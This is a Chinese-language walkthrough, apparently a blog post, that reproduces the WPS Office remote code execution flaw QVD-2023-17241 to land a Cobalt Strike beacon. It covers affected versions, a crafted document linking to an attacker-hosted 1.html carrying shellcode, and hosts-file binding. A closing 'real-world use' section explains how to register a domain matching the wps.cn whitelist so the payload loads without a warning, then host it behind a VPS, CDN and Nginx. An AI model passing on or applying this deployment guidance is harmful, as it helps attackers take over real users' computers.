WPS Office RCE(QVD-2023-17241)漏洞复现上线CS
一、复现过程
影响版本
WPS Office 2023个人版<11.1.0.15120
WPS Office 2019企业版<11.8.2.12085
修改配合联动上线CS
-修改html中的shellcode(C#)
-修改docx中的指向连接URL
-修改hosts绑定执行域名规则
漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn
客户机安装符合版本的WPS软件,并配置host文件以将目标攻击IP绑定到该域名:clientweb.docer.wps.cn.cloudwps.cn
例:192.168.196.30 clientweb.docer.wps.cn.cloudwps.cn
2、在攻击机搭建一个web服务器 。
利用CS工具生成相应的payload,并将其替换到1.html文件中进行操作;随后将该payload放置在当前目录中以便使用
4、在原有链接的基础上添加端口(即之前提到的那个端口),对PPT中的链接进行修改: http://clientweb.docer.wps.cn.cloudwps.cn/$variable$/1.html 点击该PPT文档后相当于访问服务器上的1号HTML文件,并打开其中包含的脚本代码(即通过CS工具生成的上线Payload)。
5、客户机点击刚刚poc.docx,可以看见受害者请求了我们的1.html。
6、回到CS这边发现已经上线了。
7、实战利用
购买wps.cn注册的域名:因为WPS平台存在规定,在访问外部网站时(尤其是包含HTML内容),WPS系统会进行安全提醒以防止潜在风险。然而,在wps.cn域名所在的白名单中注册的域名,在WPS环境中是被允许访问的。因此,在访问包含外部链接的内容时(尤其是来自wps.cn网站的内容),不会触发该平台的安全警告提示
购买域名及VPS后,请按照以下步骤操作:首先将子域名 clientweb.docer.wps.cn.***wps.cn配置到购买的VPS上;其次尽可能设置一层CDN加速;最后通过Nginx进行反向代理服务。特别说明:该子域名必须严格按照上述格式配置(否则可能导致DNS解析异常)。
实战中:申请{xxxxx}wps.cn域名
增加解析clientweb.docer.wps.cn.{xxxxx}wps.cn ip上面
IP架设1.html网站服务,修改1.html替换上线shellcode